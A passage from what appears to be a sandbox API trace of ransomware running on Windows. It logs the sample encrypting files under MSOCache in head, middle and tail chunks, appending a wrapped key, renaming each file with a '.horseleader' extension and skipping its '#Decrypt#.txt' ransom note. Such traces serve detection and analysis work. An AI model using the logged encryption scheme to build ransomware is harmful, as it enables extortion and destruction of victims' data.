cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0219.446] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch=".horseleader") returned 0x0 [0219.446] lstrcmpW (lpString1="ProPlusrWW.xml", lpString2="#Decrypt#.txt") returned 1 [0219.446] lstrcmpW (lpString1="ProPlusrWW.xml", lpString2="_uninstalling_.png") returned 1 [0219.446] lstrlenW (lpString=".testttjffg") returned 11 [0219.446] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpSrch=".testttjffg") returned 0x0 [0219.446] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.446] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.446] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.447] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0219.447] StrStrW (lpFirst="ProPlusrWW.xml", lpSrch=".txt") returned 0x0 [0219.447] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=16852) returned 1 [0219.447] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x41d4, lpOverlapped=0x0) returned 1 [0219.449] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffbe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0xffffffff) returned 1 [0219.449] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x41d4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x41d4, lpOverlapped=0x0) returned 1 [0219.449] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.449] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.449] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.449] CloseHandle (hObject=0x21c) returned 1 [0219.450] GetProcessHeap () returned 0x780000 [0219.450] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.450] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.horseleader") returned 93 [0219.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.horseleader")) returned 1 [0219.453] GetProcessHeap () returned 0x780000 [0219.453] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.453] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: 
lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1 [0219.453] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="Windows") returned -1 [0219.453] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0219.453] StrStrIW (lpFirst="ProPrWW.cab", lpSrch=".horseleader") returned 0x0 [0219.454] lstrcmpW (lpString1="ProPrWW.cab", lpString2="#Decrypt#.txt") returned 1 [0219.454] lstrcmpW (lpString1="ProPrWW.cab", lpString2="_uninstalling_.png") returned 1 [0219.454] lstrlenW (lpString=".testttjffg") returned 11 [0219.454] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", lpSrch=".testttjffg") returned 0x0 [0219.454] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.454] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.454] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.455] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0219.455] StrStrW (lpFirst="ProPrWW.cab", lpSrch=".txt") returned 0x0 [0219.455] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=177720283) returned 1 [0219.455] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.455] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.491] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.491] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.493] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x54bbded, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.493] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.496] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.497] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.497] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa977bdb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 
[0219.497] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.500] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.500] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.500] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.500] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.500] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.501] CloseHandle (hObject=0x21c) returned 1 [0219.501] GetProcessHeap () returned 0x780000 [0219.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.501] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.horseleader") returned 90 [0219.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.horseleader" (normalized: 
"c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.horseleader")) returned 1 [0219.502] GetProcessHeap () returned 0x780000 [0219.502] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.502] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1 [0219.502] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="Windows") returned -1 [0219.502] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0219.502] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch=".horseleader") returned 0x0 [0219.502] lstrcmpW (lpString1="ProPrWW2.cab", lpString2="#Decrypt#.txt") returned 1 [0219.502] lstrcmpW (lpString1="ProPrWW2.cab", lpString2="_uninstalling_.png") returned 1 [0219.502] lstrlenW (lpString=".testttjffg") returned 11 [0219.502] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab", lpSrch=".testttjffg") returned 0x0 [0219.502] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.502] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.502] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: 
"c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.504] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0219.504] StrStrW (lpFirst="ProPrWW2.cab", lpSrch=".txt") returned 0x0 [0219.504] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=222948913) returned 1 [0219.504] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.504] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.514] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.514] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.514] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6a4cf18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.514] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.520] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.520] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.521] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd499e31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.521] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.523] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.523] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.524] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.524] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.524] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.524] CloseHandle (hObject=0x21c) returned 1 [0219.524] GetProcessHeap () returned 0x780000 [0219.524] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.524] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.horseleader") returned 91 [0219.525] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.horseleader")) returned 1 [0219.525] GetProcessHeap () returned 0x780000 [0219.525] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.525] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0219.526] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0219.526] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0219.526] StrStrIW (lpFirst="setup.exe", lpSrch=".horseleader") returned 0x0 [0219.526] lstrcmpW (lpString1="setup.exe", lpString2="#Decrypt#.txt") returned 1 [0219.526] lstrcmpW (lpString1="setup.exe", lpString2="_uninstalling_.png") returned 1 [0219.526] lstrlenW (lpString=".testttjffg") returned 11 [0219.526] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe", lpSrch=".testttjffg") returned 0x0 [0219.526] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.526] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.527] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.527] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0219.527] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0219.527] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1377656) returned 1 [0219.527] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.527] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.530] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.530] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.530] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa5abc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.530] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, 
lpOverlapped=0x0) returned 1 [0219.532] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.532] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.532] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x14b578, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.532] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.541] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.541] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.542] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.542] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.542] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.542] CloseHandle (hObject=0x21c) returned 1 [0219.543] GetProcessHeap () returned 0x780000 [0219.543] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.543] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader") returned 88 [0219.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.horseleader")) returned 1 [0219.544] GetProcessHeap () returned 0x780000 [0219.544] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.544] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0219.544] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0219.544] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0219.544] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0219.544] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0219.544] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0219.544] lstrlenW (lpString=".testttjffg") returned 11 [0219.544] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All 
